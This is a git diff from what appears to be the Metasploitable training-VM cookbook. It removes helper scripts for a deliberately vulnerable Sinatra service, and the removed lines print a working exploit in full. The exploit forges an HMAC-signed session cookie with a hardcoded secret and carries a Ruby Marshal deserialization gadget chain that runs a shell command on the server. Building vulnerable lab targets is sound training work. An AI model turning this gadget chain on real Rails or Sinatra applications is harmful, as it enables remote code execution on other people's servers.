diff --git a/chef/cookbooks/metasploitable/files/sinatra/README.txt b/chef/cookbooks/metasploitable/files/sinatra/README.txt index 1ad1eab..3d9611c 100644 --- a/chef/cookbooks/metasploitable/files/sinatra/README.txt +++ b/chef/cookbooks/metasploitable/files/sinatra/README.txt @@ -9,13 +9,6 @@ Since this is a custom application, the Metasploitable player is required to figure out what the secret is (remotely, not through code reading), and write an exploit from scratch. -For development purposes, you can use the following scripts to test the -vulnerable service: - -* check.rb - This will check if the application is vulnerable. -* poc.rb - This will attempt to exploit the application. It will create a - file named /tmp/your_id.txt - ============== Usage ============== diff --git a/chef/cookbooks/metasploitable/files/sinatra/check.rb b/chef/cookbooks/metasploitable/files/sinatra/check.rb deleted file mode 100644 index 647c424..0000000 --- a/chef/cookbooks/metasploitable/files/sinatra/check.rb +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env ruby - -# -# This will check our vulnerable app to see if it's vulnerable or not. -# It does so by predicting the hash in the cookie. -# - -require 'openssl' -require 'cgi' -require 'net/http' - -SECRET = "a7aebc287bba0ee4e64f947415a94e5f" - -cli = Net::HTTP.new('127.0.0.1', 8181) -req = Net::HTTP::Get.new('/') -res = cli.request(req) -cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || '' -data, hash = cookie.split('--') -puts "[*] Found hash: #{hash}" -puts "[*] Attempting to recreate the same hash with secret: #{SECRET}" -expected_hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, CGI.unescape(data)) -puts "[*] Predicted hash: #{expected_hash}" - -if expected_hash == hash - puts "[*] Yay! we can predict the hash. The server is vulnerable." -end diff --git a/chef/cookbooks/metasploitable/files/sinatra/poc.rb b/chef/cookbooks/metasploitable/files/sinatra/poc.rb deleted file mode 100644 index c1de5bb..0000000 --- a/chef/cookbooks/metasploitable/files/sinatra/poc.rb +++ /dev/null @@ -1,34 +0,0 @@ -#!/usr/bin/env ruby - -# -# This PoC will inject Ruby code in our vulnerable app. -# It will run the system command "id", and save the output in /tmp/your_id.txt -# - -require 'openssl' -require 'cgi' -require 'net/http' - -SECRET = "a7aebc287bba0ee4e64f947415a94e5f" - -module Erubis;class Eruby;end;end -module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end - -erubis = Erubis::Eruby.allocate -erubis.instance_variable_set :@src, "%x(id > /tmp/your_id.txt); 1" -proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate -proxy.instance_variable_set :@instance, erubis -proxy.instance_variable_set :@method, :result -proxy.instance_variable_set :@var, "@result" - -session = { 'session_id' => '', 'exploit' => proxy } - -dump = [ Marshal.dump(session) ].pack('m') -hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump) -cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}" - -http = Net::HTTP.new('127.0.0.1', 8181) -req = Net::HTTP::Get.new('/') -req['Cookie'] = cookie -res = http.request(req) -puts "Done" diff --git a/chef/cookbooks/metasploitable/recipes/sinatra.rb b/chef/cookbooks/metasploitable/recipes/sinatra.rb index 583bb87..c4900c7 100644 --- a/chef/cookbooks/metasploitable/recipes/sinatra.rb +++ b/chef/cookbooks/metasploitable/recipes/sinatra.rb @@ -13,7 +13,7 @@ directory '/opt/sinatra' do mode '0777' end -['Gemfile', 'README.txt', 'check.rb', 'poc.rb', 'start.sh', 'server.rb'].each do |fname| +['Gemfile', 'README.txt', 'start.sh', 'server.rb'].each do |fname| cookbook_file "/opt/sinatra/#{fname}" do source "sinatra/#{fname}" mode '0777'